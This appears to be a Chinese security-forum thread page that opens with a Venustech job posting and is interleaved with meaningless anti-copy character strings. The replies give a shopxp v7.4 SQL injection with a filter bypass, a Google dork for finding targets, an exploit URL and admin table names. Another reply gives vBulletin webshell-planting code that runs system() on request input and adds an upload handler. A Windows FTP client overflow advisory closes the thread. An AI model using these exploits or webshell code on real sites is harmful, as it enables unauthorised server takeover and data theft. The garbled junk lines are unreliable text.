返回列表 发帖
  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: liu_yanhua@venustech.com.cn
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    岗位:备机库主管
    ( I  R$ ?0 }: {, x1 L
    . q1 S5 W6 f% J8 e* i, Q$ u2 z8 {1 Z  v
    岗位职责:
    " `" E- |0 {1 [. S2 S9 O
    + w( `0 f: R& z, L  N1.负责公司产品备机库的管理。
    & Z& ^/ N3 t5 a2 J3 d  z
    8 [" C2 E9 Q: R7 v2.产品安装调试。# ?& U2 V2 v( ~6 C
    # V' y6 F. |/ e1 |2 ~3 k  Y
    3.对备机使用情况做统计分析。8 f9 J+ F5 ?. k0 t
    ( N! k' n2 a: Y3 J, Z' }: @- N
    岗位要求:; {9 w0 w5 A' `% C

    % o' p5 ~! s, j. \. @6 ~1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。
    # e; K" Z3 w3 K% y1 S
    - W1 a- A* X7 x; L) d( H2.熟悉路由器、交换机等常用网络设备。
    / Y8 ]8 r* j4 H
    # @  ]- C& n1 E( }" q0 L  ~3.熟悉防火墙、VPN等常见网络安全产品。
    ( Q) z) K! M8 |- q+ J- D& B3 K0 o7 x, [5 O
    4.了解计算机硬件相关知识。
    9 Z8 C# \& S- }3 T+ o5 d7 \2 J: B" c% t
    5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。" x1 [+ V1 d% u- u
    5 c$ L) w8 v# \  v/ b" K
    6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。  z( n7 [+ j( p

    # f# A% s1 Q- m, G发送简历

     

    您可能还想看的主题:

    浙江政安信息安全研究中心招贤纳士啦!

    启明星辰研发招聘

    合优网站管理系统存在SQL注射。。。原创首发~

    联想研究院 安全职位

    PHP VS ASP

    计算机硬件维护知识

    1

    评分人数

      • webmaster: 楼主MJJ威望 + 30 金钱 + 200 金
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    shopxp v7.4 SQL注入漏洞
    shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<%
    - b' }9 @9 F! y% g; n7 H% E/ j* G5 D% ]
    dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages
    6 U0 V- Y4 p8 i( k% m# y
    if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if
    " l- z7 x" n$ ~8 [# Q7 j
    set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码
    - @: J. J" w6 @5 U
    这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:
    5 t! ^- {: d: x! S" b+ [& B
    “它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。

    " u& o; ]4 V9 H" Y2 F! x1 w2 Z
    乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?
    . H2 h- [: R8 y2 E
    它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。

    0 U# b& ]! z5 T
    等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。

    ! h: h6 b8 I5 {
    程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”

    / `4 x+ i: E4 j8 x# G3 f
    下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin
    / f1 O* q0 b$ a" x- r* r. Q+ k
    1 |7 ?6 {; I  `0 f
    5 R  J% A: N; Q: r* b% Y) n
    ' w6 R* M7 Y& Y' S$ o) B, ?& ~

    ; Z2 `: c. o) L: u+ x$ E* I
    8 ~3 `# _$ ]8 ~! Z* c& I
    1 Z2 `- j) L4 E. ^; f- I+ B. P3 M
      H/ E( A8 q+ X* Q
    ' H( b4 I+ g. d' Z) e# A  E  l3 N! Z- C* }4 l

    ; d- p0 q  E, i" H9 q+ j/ F
    5 X& m5 ^+ }( p+ x5 a( A- q# h6 I0 P
    ' L4 [: p' X# @! p5 ]
    7 O! r. j9 l, e0 L# C
    " r" R" Z9 _6 ~, X" K- v8 a
    : @! E0 |" v" @4 K' m$ U$ B. {: q3 G) [* @$ u5 T! e

    4 Z3 ]) Z1 g! e+ v3 j1 K! u$ C
    5 F; V+ D; x, T* W1 e" h公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    vBulletin后台获取webshell方法总结
    方法一:
    6 m$ D4 p$ I3 I5 g首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。& Z0 K" A0 J' }2 c; T& p
    0 t; I6 \* A* E# J' j  X  K2 K6 r
    方法二:' U# {- A5 N9 R! ?. C! }
    前边相同,代码处写一个接收上传的代码:
    - j" H: M( j3 o1 X. l5 `
    $target_path = "images/avatars"; //注意权限要为可写的

    4 B# A' c4 u3 p8 R  L+ X
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
    2 u! K4 z* h3 H, [9 [
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { % P- l+ c2 V) g4 o
        echo "The file ". basename( $_FILES['uploadedfile']['name']).
    $ ^& u5 H: F$ j  U( }1 ~0 R% x% F    " has been uploaded"; 7 ~: a* t  b1 g, \0 g( l. }
    } else{ 8 d' |+ T: ?9 \0 ?: h% ?" f
        echo "There was an error uploading the file, please try again!";
    - b0 d& |+ x% R}
    , F7 b! n4 j% l
       然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:

    & G* x9 A8 V: @& G+ X' @
    <form enctype="multipart/form-data" action="ajax.php" method="POST">
    / W' H, Z# Q  d<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
    & A: ]- Z( f& BChoose a file to upload: <input name="uploadedfile" type="file" /><br />
    . Y% ~% d& y& I' [& n# n/ D3 c& X<input type="hidden" name="s" value="$session[sessionhash]" /> / w7 Y/ T* O" X4 b6 F2 }+ {
    <input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />
    $ C) J9 Y  e& z- V3 `* E7 r<input type="submit" value="Upload File" /> 0 S3 `: C. O) I; L+ |) G
    </form>
    # k0 w: T, Y# r8 c4 k* n; [  r
    保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用) z0 A1 I$ `; E! O
    " [4 M- n$ n- U, `5 ]  H
    ! w' h  V. A) P" n. D% n! U8 K  r

      X: K  e# Y! j$ R+ c) W* R7 p5 a& s8 p  Y& ~
    : m4 x7 W" E8 O7 a

    ; P2 ^$ t9 ^% h2 {: r& \) ^& k5 N
    . q. @7 |; d5 p; n. G
    # v# X# ]( A# I, E7 t$ U( n0 y& t6 }$ f1 e: d, E! n3 U

    & p  I5 `- _# l, x9 c3 F8 ~7 J. F6 X6 ]" j+ Q6 Q' d( N. Q# @
    / @% p7 {' T6 r0 F' g7 u
    + R# \5 X: p  ^0 ?9 m8 {" V
    / ^% q3 D* x; r9 w; B9 r- B2 o
    3 w4 L' y& k5 Q+ {, _

    : r8 l# m. B- D7 G" e, l1 K5 ?4 w0 Q0 u: S- \
    9 F! ^2 p, _$ h% B6 L5 L4 n

    , t  [& A  h  ?4 b6 Z. ?: b6 u1 ~3 S# K% @; y- T& q3 `! I: `/ ]
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Microsoft Windows FTP客户端有多个远程溢出漏洞
    受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4
    / \2 B' {. Q7 O8 |8 q
    描述:
    , c5 W! q5 T3 L, I+ W
    Microsoft Windows是微软发布的非常流行的操作系统。
    . Z' B. Q; d' v4 }
    Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。
    4 @$ F4 T9 m' ]1 i; _
    Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。
    6 g3 ]5 a( s0 ?3 q% S( H- v
    厂商补丁:

    # k  A0 a  S* L& W- n3 k" S1 }% \
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
    * {( v0 c. F& O7 ^* S$ m3 S/ g
    http://www.microsoft.com/technet/security/

    2 O  f3 M  N4 f
    5 W6 A% f* u5 k! [0 p# t
    * ^" U, p% q. i) {) v3 n% c2 H7 U! W7 a1 ?+ l% N, c
    7 |4 k8 b/ z4 A' S1 Y$ }

    & b  Y* R3 h& ~/ r
    5 r0 C+ b5 ~$ n9 L( ?: F. a( C4 I, M1 e( p! o

    # e5 |5 [: r' g, j
    1 g. z$ y# T" w
    ( j2 S, R6 a# p$ p! n- z% U4 P8 B8 w/ h# `6 D' {

    5 ^# Q8 e$ {$ w, x( r% a. A9 h9 N) R. ~: q

    + M  b8 [$ B* s8 k/ R; F& O$ V  V% x$ i
    : ?0 U. K+ |1 T( l* W2 \
    2 d( _) W2 V9 N: o

    ! T+ ]& R2 j" P9 y7 d3 W" V' B公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表